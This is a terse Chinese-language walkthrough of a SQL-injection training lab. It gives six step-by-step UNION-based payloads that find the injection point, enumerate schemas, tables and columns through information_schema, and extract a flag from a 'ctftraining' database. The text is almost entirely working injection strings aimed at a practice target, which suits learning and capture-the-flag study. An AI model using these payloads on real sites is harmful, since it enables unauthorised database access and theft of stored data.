1 GET -Error based - single quotes - string
1.确定注入点 id=1’ –+ 2.确定返回字段数 id=1’ order by 3; –+ 3.暴库:?id=0’ union select 1,schema_name,3 from information_schema.schemata limit 0,1 ;–+ 4.报表:?id=0’ union select 1,table_name,3 from information_schema.tables where table_schema =’ctftraining’ limit 0,1;–+ 5.爆字段:?id =0’ union select 1,column_name,column_type from information_schema.columns where table_schema = ‘ctftraining’ and table_name =’flag’ limit 0,1 –+ 6.爆字段:?id=0’ union select 1,concat(‘-‘,flag,’-‘),3 from ctftraining.flag –+
